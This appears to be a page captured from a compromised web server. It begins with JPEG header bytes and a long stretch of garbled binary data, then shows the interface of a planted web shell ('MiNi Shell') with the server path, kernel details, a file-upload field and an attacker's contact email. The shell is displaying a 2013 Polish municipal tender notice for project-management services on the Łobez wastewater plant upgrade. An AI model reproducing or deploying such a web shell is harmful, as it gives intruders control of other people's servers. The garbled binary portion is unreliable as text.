JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130708/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130708/136613-N-2013.html

<p class="kh_header"><b>Łobez: PEŁNIENIE FUNKCJI PEŁNOMOCNIKA 
I ZASTĘPCY PEŁNOMOCNIKA DS. REALIZACJI PROJEKTU 
PN. MODERNIZACJA I ROZBUDOWA OCZYSZCZALNI ŚCIEKÓW W ŁOBZIE 
MAO (MEASURE AUTHORISING OFFICER). - II</b><br>
<b>Numer ogłoszenia: 136613 - 2013; data zamieszczenia: 08.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łobez , ul. Niepodległości 13, 73-150 Łobez, woj. zachodniopomorskie, tel. 091 3974001, faks 091 3974373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lobez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI PEŁNOMOCNIKA 
I ZASTĘPCY PEŁNOMOCNIKA DS. REALIZACJI PROJEKTU 
PN. MODERNIZACJA I ROZBUDOWA OCZYSZCZALNI ŚCIEKÓW W ŁOBZIE 
MAO (MEASURE AUTHORISING OFFICER). - II.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest pełnienie funkcji Pełnomocnika i zastępcy Pełnomocnika ds. Realizacji projektu pn. Modernizacja i rozbudowa oczyszczalni ścieków w Łobzie - MAO (Measure Authorising Officer).
Przedstawiciel Wykonawcy niniejszego zamówienia będzie działał w zakresie uprawnień i obowiązków określonych w niniejszej specyfikacji istotnych warunków zamówienia (siwz). 
1.Cel zamówienia.
Zamawiający powierzy Wykonawcy zarządzanie, kontrolę, nadzór nad realizacją oraz rozliczenie Kontraktu, o którym mowa w pkt. 3.2., w celu realizacji projektu zgodnie ze specyfikacją w ustalonym w umowie o dofinansowanie terminie. 
2.Obowiązki MAO
Do obowiązków Wykonawcy należy ponadto w szczególności:
1)w zakresie zarządzania Projektem:
a)Wykonawca nadzoruje Jednostkę Realizacji Projektu (dalej zwaną: JRP), zapewnia realizację Projektu zgodnie z zasadami zawartymi w decyzji KE pn. Podręcznik procedur wdrażania Funduszu Spójności w NFOŚiGW,
b)Wykonawca jest odpowiedzialny za prowadzenie wszelkiej korespondencji z Instytucji Wdrażającej (dalej zwaną: IW) /  Instytucją Pośredniczącą (dalej zwaną: IP) w zakresie realizacji projektu,
c)po podpisaniu dokumentów przez Inżyniera Kontraktu i Kierownika JRP, Wykonawca zatwierdza i podpisuje lub poświadcza dokumenty potwierdzające prawidłowe wykonanie zakresu rzeczowego części lub całości Projektu: protokoły częściowego odbioru wykonanych robót, świadectwa przejęcia, świadectwa wykonania lub protokoły końcowego odbioru i przekazania do eksploatacji, przejściowe świadectwa płatności, protokoły konieczności łącznie z protokołami z negocjacji, dokumenty potwierdzające osiągnięcie zakładanych efektów ekologicznych, Raport Końcowy itp.,
d)Wykonawca nadzoruje prawidłową współpracę pomiędzy Zamawiającym, JRP, Inżynierem Kontraktu, a wykonawcą robót, 
e)Wykonawca opracowuje i wdraża procedury:
- weryfikacji, czy roboty, usługi / dostawy, za które dokonywana jest płatność zostały rzeczywiście wykonane zgodnie z zawarta umową,
- przygotowywania wniosków o płatność, 
-archiwizowania dokumentów,  
-zawierania umów dla zadań objętych projektem, zgodnie z wytycznymi w zakresie wdrażania projektów w ramach POIiŚ,
f)Wykonawca współpracuje z JRP przy opracowywaniu / aktualizacji Planu finansowania projektu, Planu wystąpień o płatność, Harmonogramu rzeczowo-finansowy, Harmonogramu realizacji projektu, Opis projektu oraz Zestawienia wskaźników do monitorowania projektu; przedkłada w/w dokumenty do IW/IP,
g)Wykonawca współpracuje z JRP przy opracowywaniu do IW sprawozdań, raportów i wniosków o płatność, przedkłada w/w dokumenty do IW,
h)Wykonawca uczestniczy w spotkaniach roboczych organizowanych przez Zamawiającego w jego siedzibie nie rzadziej niż raz na tydzień,
i)na każde wezwanie Zamawiającego, Instytucji Wdrażającej lub Instytucji Pośredniczącej, Wykonawca w przeciągu 24 godzin od momentu uzyskania informacji ze strony Zamawiającego zobowiązany będzie uczestniczyć w wyznaczonym spotkaniu w miejscu realizacji przedsięwzięcia lub w siedzibie Instytucji Wdrażającej / Instytucji Pośredniczącej,
2)w zakresie przetargów:
a)Wykonawca jest odpowiedzialny za przygotowanie i publikacje ogłoszenia, przygotowanie specyfikacji istotnych warunków zamówienia (SIWZ), w tym kryteriów oceny ofert, jak również za przygotowanie i przeprowadzenie postępowań o udzielenie zamówienia publicznego na realizację zadań objętych Projektem zgodnie z ustawą Prawo zamówień publicznych,
b)Wykonawca jest odpowiedzialny za poprawność i kompletność umów z wykonawcą robót, potwierdzenie poprawności Wykonawca stwierdza opatrując stosowne dokumenty swoją parafą,
c)Wykonawca jest odpowiedzialny za wymagane przepisami prawa warunki przechowywania i udostępniania dokumentacji o udzielenie zamówienia publicznego i ofert oraz za wymagane przepisami warunki przechowywania i udostępniania umów z wykonawcami,
d)Wykonawca zobowiązany jest uczestniczyć w pracach komisji przetargowej, 
3)w zakresie finansów:
a)Wykonawca nadzoruje realizację gospodarki finansowej w ramach projektu,
b)Wykonawca upoważniony jest i zobowiązany do podpisania wniosku Beneficjenta o przekazanie środków (wniosek o zaliczkę z rozliczeniem, zaliczkę bez rozliczenia lub o refundację) wraz z niezbędnymi dokumentami, warunkującymi przekazanie środków, po jego wcześniejszej akceptacji przez Skarbnika Gminy, 
c)Wykonawca parafuje dokumenty rozliczeniowe, w tym faktury, dotyczące ponoszonych przez Beneficjenta wydatków kwalifikowanych Projektu,
d)Wykonawca upoważniony jest i zobowiązany do podpisania wniosku o płatność końcową wraz z niezbędnymi dokumentami, warunkującymi przekazanie środków, po jego wcześniejszej akceptacji przez Skarbnika Gminy, 
4)w zakresie monitoringu: 
a)Wykonawca monitoruje rzeczowy i finansowy postęp w realizacji Projektu oraz zgodność realizacji Projektu z przepisami prawa krajowego i wspólnotowego, a w szczególności z zasadami określonymi w umowie dofinansowania oraz z wytycznymi Ministerstwa Rozwoju Regionalnego dla Programu Operacyjnego Infrastruktura i Środowisko,   
b)Wykonawca zatwierdza, oraz upoważniony jest i zobowiązany do podpisania i przekazania do Wojewódzkiego Funduszu Ochrony Środowiska i Gospodarki Wodnej w Szczecinie, będącego Instytucją Wdrażającą (IW), (co najmniej raz na trzy miesiące) wniosku o płatność, z rozbudowaną częścią sprawozdawczą, zgodnie z harmonogramem rzeczowo-finansowym dołączonym do zatwierdzonej umowy o dofinansowanie, biorąc pod uwagę datę podpisania umowy. Brak poniesionych wydatków związanych z projektem nie zwalnia Beneficjenta z wypełnienia wniosku, w szczególności części dotyczącej postępu rzeczowego. Beneficjent jest zobowiązany także do przekazywania raportów z osiągniętych efektów w okresie 5 lat po zakończeniu realizacji projektu,
c)Wykonawca zobowiązany jest do przygotowania informacji o realizacji Projektu dla prasy.
5)w zakresie kontroli:
a)Wykonawca uczestniczy we wszystkich kontrolach realizacji projektu przez upoważnione instytucje,
b)Wykonawca może zgłosić zastrzeżenia do informacji pokontrolnej, w szczególności zastrzeżeń do konkretnych faktów ujętych w protokole kontroli, w przypadku uznania ich za niezgodne ze stanem faktycznym, 
c)Wykonawca jest upoważniony i zobowiązany do podpisania protokołu kontroli wykonywanej w ramach Projektu, po jego wcześniejszej akceptacji przez Skarbnika Gminy,
3.Charakterystyka projektu.
Inwestycja przewiduje wykonanie modernizacji istniejących obiektów oczyszczalni oraz budowę 4 nowych, w tym wielofunkcyjnego reaktora biologicznego przepływowego w wysokiej sprawności usuwania związków węgla, azotu i fosforu. 
Projekt przewiduje również wymianę lub montaż podstawowych urządzeń technicznych, w tym między innymi: 
pompy, 
dmuchawy 
prasa taśmowa do odwadniania osadu. 
Planowana wydajność oczyszczalni dla okresu 2020 r. wynosi Qśrd = 4500 m3/d (pora deszczowa), w porze bezdeszczowej Qśrd = 3150 m3/d. Odbiornikiem ścieków oczyszczonych jest rzeka Rega.
Na zakres prac obejmujących przedmiotową inwestycję składają się m.in.:
Szczegółowo, na zakres prac obejmujących przedmiotową inwestycję składają się m.in.:
Roboty budowlane
Budynek krat nr 2
Budynek pompowni ścieków nr 3
Komora rozdziału ścieków Nr 31
Reaktor biologiczny nr 30
Stacja PIX nr 32
Budynek pompowni osadu nr 10
Budynek odwadniania osadu Nr 15 i 34
Fundament pod silos wapna Nr 35
Urządzenia technologiczne
Budynki i obiekty technologiczne
Sieci zewnętrzne
Tymczasowa pompownia osadu
Instalacje sanitarne
Ukształtowanie terenu i zieleń
Instalacje elektryczne
Drogi wewnętrzne
Roboty przygotowawcze
Podbudowy
Nawierzchnie
Roboty wykończeniowe
Elementy ulic
Rozruch technologiczny
Obsługa geodezyjna..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielanie zamówień uzupełniających, stanowiących nie więcej niż 20% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwie usługi podobne do objętych przedmiotem zamówienia.
Za usługę podobną zamawiający uzna: usługę w zakresie pełnienia funkcji Zarządzającego Projektem (np. Inżynier Kontraktu, Inżynier Projektu, MAO) przy realizacji, co najmniej dwóch projektów współfinansowanych z zewnętrznych środków pomocowych, z których każdy miał wartość nie mniejszą niż 7.500.000,00 PLN brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponować, co najmniej po jednej osobie na każde wymienione poniżej stanowisko:
a)Pełnomocnik MAO: 
-wykształcenie wyższe
-co najmniej 7-letnie doświadczenie w pracy na stanowisku kierowniczym
-co najmniej 3-letnie doświadczenie przy koordynacji i zarządzaniu minimum 3 projektami współfinansowanymi z zewnętrznych środków pomocowych, w tym doświadczenie na stanowisku: Pełnomocnik MAO lub Inżynier Kontraktu lub Inżynier Rezydent lub Kierownik Kontraktu lub Przedstawiciel Inżyniera Kontraktu lub Przedstawiciel Inżyniera Projektu lub Koordynator Projektu lub na stanowisku tożsamym. Wartość przynajmniej jednego ze wskazanych projektów nie może być mniejsza niż 7.500.000,00 PLN brutto
-prowadzenie, co najmniej jednego zadania inwestycyjnego zgodnie z zasadami FIDIC, współfinansowanego z zewnętrznych środków pomocowych.
 Uwaga: Zamawiający nie dopuszcza łączenia stanowiska Pełnomocnika z innymi stanowiskami. 

b)Zastępca Pełnomocnika MAO: 
-wykształcenie wyższe ekonomiczne
-nie mniej niż 5 lat doświadczenia zawodowego przy rozliczaniu projektów, w tym co najmniej przy 2 projektach współfinansowanych z zewnętrznych środków pomocowych, w tym jeden o wartości nie mniejszej niż 7.000.000,00 PLN brutto
-rozliczenie, co najmniej jednego zadania inwestycyjnego zgodnie z zasadami FIDIC, współfinansowanego z zewnętrznych środków pomocowych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ust.1 ustawy PZP przewiduje możliwość dokonania zmian w treści zawartej umowy w stosunku do treści oferty w zakresie:
1)w przypadku przedłużenia terminu realizacji Umowy o dofinansowanie POIS.01.01.00-00-325/12-00 z dnia 27-06-2013r projektu pn. Modernizacja i rozbudowa oczyszczalni ścieków w Łobzie,
2)z powodu siły wyższej, za którą uważa się nieznane stronom w chwili zawierania umowy zdarzenia, zaistniałe niezależnie od woli Stron i na których zaistnienie Strony nie miały żadnego wpływu i które uniemożliwiają wykonanie umowy,
3)gdy wystąpi konieczność zmiany osoby lub osób wchodzących w skład Zespołu MAO ze względu na nienależyte wywiązywanie się z obowiązków, z przyczyn losowych oraz innych przyczyn niezależnych od Wykonawcy,
4)może ulec zmianie wynagrodzenie Wykonawcy w przypadku zmiany wysokości ustawowej  stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lobez.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski
73-150 Łobez 
ul. Niepodległości 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.07.2013 godzina 10:00, miejsce: Urząd Miejski
73-150 Łobez 
ul. Niepodległości 13.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Funduszu Spójności w ramach Programu Infrastruktura i Środowisko na lata 2007-2013. 
Priorytet 1 Gospodarka wodno-ściekowa.
Działanie 1.1. Gospodarka wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com